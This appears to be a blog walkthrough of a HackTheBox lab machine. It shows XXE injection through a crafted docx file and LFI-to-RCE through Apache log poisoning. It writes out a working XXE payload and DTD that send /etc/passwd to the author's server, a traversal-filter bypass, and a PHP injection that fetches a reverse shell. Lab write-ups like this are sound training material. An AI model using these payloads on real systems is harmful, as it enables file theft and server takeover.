Saturday, May 27, 2023

XXE In Docx Files And LFI To RCE


In this article we are going to talk about XXE injection and we will also look at LFI in a little more advanced perspective. I will be performing both of these attacks on a HackTheBox machine called Patents which was a really hard machine. I am not going to show you how to solve the Patents machine rather I will show you how to perform the above mentioned attacks on the box.

XML External Entity Attack

Lets start with what an XXE injection means. OWASP has put XXE on number 4 of OWASP Top Ten 2017 and describes XXE in the following words: "An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts."
What that means is if you have an XML parser which is not properly configured to parse the input data you may end you getting yourself screwed. On the Patents box there is an upload form which lets us upload a word document (docx) and then parses it to convert it into a pdf document. You may be thinking but where is the XML document involved here. Well it turns out that the docx files are made up of multiple XML documents archived together. Read more about it in the article OpenXML in word processing – Custom XML part – mapping flat data. It turns out that the docx2pdf parser of the Patents machine is poorly configured to allow XXE injection attacks but to perform that attack we need to inject out XXE payload in the docx file. First lets upload a simple docx file to the server and see what happens.

After uploading the file we get a Download option to download the pdf file that was created from our docx file.

As can be seen, the functionality works as expected.

Now lets exploit it. What we have to do is that we have to inject our XXE payload in the docx file so that the poorly configured XML parser on the server parses our payload and allows us to exfil data from the server. To do that we will perform these steps.
  1. Extract the docx file.
  2. Embed our payload in the extracted files.
  3. Archive the file back in the docx format.
  4. Upload the file on the server.
To extract the docx file we will use the unzip Linux command line tool.
mkdir doc cd doc unzip ../sample.docx 
Following the article mentioned above we see that we can embed custom XML to the docx file by creating a directory (folder) called customXml inside the extracted folder and add an item1.xml file which will contain our payload.
mkdir customXml cd customXml vim item1.xml 
Lets grab an XXE payload from PayloadsAllTheThings GitHub repo and modify it a bit which looks like this:
<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://10.10.14.56:8090/dtd.xml"> %sp; %param1; ]> <r>&exfil;</r> 
Notice the IP address in the middle of the payload, this IP address points to my python server which I'm going to host on my machine shortly on port 8090. The contents of the dtd.xml file that is being accessed by the payload is:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.56:8090/dtd.xml?%data;'>"> 
What this xml file is doing is that it is requesting the /etc/passwd file on the local server of the XML parser and then encoding the contents of /etc/passwd into base64 format (the encoding is done because that contents of the /etc/passwd file could be something that can break the request). Now lets zip the un-archived files back to the docx file using the zip linux command line tool.
zip -r sample.docx * 
here -r means recursive and * means all files sample.docx is the output file.
Lets summarize the attack a bit before performing it. We created a docx file with an XXE payload, the payload will ping back to our server looking for a file named dtd.xml. dtd.xml file will be parsed by the XML parser on the server in the context of the server. Grabbing the /etc/passwd file from the server encoding it using base64 and then sends that base64 encoded data back to us in the request.
Now lets fire-up our simple http python server in the same directory we kept our dtd.xml file:
python -m SimpleHTTPServer 8090 
and then upload the file to the server and see if it works.
We got a hit on our python server from the target server looking for the dtd.xml file and we can see a 200 OK besides the request.
Below the request for dtd.xml we can see another request which was made by the target server to our server and appended to the end of this request is the base64 encoded data. We grab everything coming after the ? of the request and copy it to a file say passwd.b64 and after that we use the base64 linux command line tool to decode the base64 data like this:
cat passwd.64 | base64 -d > passwd
looking at the contents of passwd file we can confirm that it is indeed the /etc/passwd file from the target server. Now we can exfiltrate other files as well from the server but remember we can only exfiltrate those files from the server to which the user running the web application has read permissions. To extract other files we simple have to change the dtd.xml file, we don't need to change our docx file. Change the dtd.xml file and then upload the sample.docx file to the server and get the contents of another file.

LFI to RCE

Now getting to the part two of the article which is LFI to RCE, the box is also vulnerable to LFI injection you can read about simple LFI in one of my previous article Learning Web Pentesting With DVWA Part 6: File Inclusion, in this article we are going a bit more advanced. The URL that is vulnerable to LFI on the machine is:
http://10.10.10.173/getPatent_alphav1.0.php 

We can use the id parameter to view the uploaded patents like this:
http://10.10.10.173/getPatent_alphav1.0.php?id=1 

The patents are basically local document files on the server, lets try to see if we can read other local files on the server using the id parameter. We try our LFI payloads and it doesn't seem to work.

Maybe its using a mechanism to prevent LFI attacks. After reading the source for getPatent_alphav1.0.php from previous vulnerability we can see it is flagging ../ in the request. To bypass that restriction we will use ..././, first two dots and the slash will be removed from ..././ and what will be left is ../, lets try it out:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././etc/passwd 

Wohoo! we got it but now what? To get an RCE we will check if we can access the apache access log file
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log 
As we can see we are able to access the apache access log file lets try to get an RCE via access logs. How this works is basically simple, the access.log file logs all the access requests to the apache server. We will include php code in our request to the server, this malicious request will be logged in the access.log file. Then using the LFI we will access the access.log file. As we access the access.log file via the LFI, the php code in our request will be executed and we will have an RCE. First lets grab a php reverse shell from pentest monkey's GitHub repo, modify the ip and port variables  to our own ip and port, and put it into the directory which our python server is hosting. I have renamed the file to shell.php for simplicity here.
Lets setup our reverse shell listener:
nc -lvnp 9999 
and then perfrom a request to the target server with our php code like this:
curl "http://10.10.10.173/<?php system('curl\$\{IFS\}http://10.10.14.56:8090/shell.php');?>" 
and lastly lets access the apache access.log file via the LFI on the target server:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log3 
Boom! we have a shell.

That's it for today's article see you next time.

References

Read more